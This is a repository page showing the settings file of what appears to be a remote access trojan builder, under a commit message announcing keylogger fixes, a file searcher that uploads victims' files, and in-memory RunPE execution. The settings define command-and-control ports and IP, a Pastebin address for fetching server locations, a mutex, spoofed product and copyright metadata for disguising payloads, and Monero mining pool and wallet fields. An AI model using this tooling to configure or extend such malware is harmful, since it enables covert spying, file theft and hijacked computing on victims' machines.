NYAN CAT c542975a12 Update
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added gorup to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise you won't be able to use the new plugins
2020-04-22 00:52:58 +03:00

63 lines
2.5 KiB
XML

<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="Server.Properties" GeneratedClassName="Settings">
<Profiles />
<Settings>
<Setting Name="Ports" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="Filename" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="Notification" Type="System.Boolean" Scope="User">
<Value Profile="(Default)">True</Value>
</Setting>
<Setting Name="Mutex" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="Pastebin" Type="System.String" Scope="User">
<Value Profile="(Default)">https://pastebin.com/raw/s14cUU5G</Value>
</Setting>
<Setting Name="IP" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="ProductName" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtDescription" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtCompany" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtCopyright" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtTrademarks" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtOriginalFilename" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtProductVersion" Type="System.String" Scope="User">
<Value Profile="(Default)">0.0.0.0</Value>
</Setting>
<Setting Name="txtFileVersion" Type="System.String" Scope="User">
<Value Profile="(Default)">0.0.0.0</Value>
</Setting>
<Setting Name="txtPool" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtWallet" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtxmrPass" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="txtBlocked" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="Group" Type="System.String" Scope="User">
<Value Profile="(Default)">Default</Value>
</Setting>
</Settings>
</SettingsFile>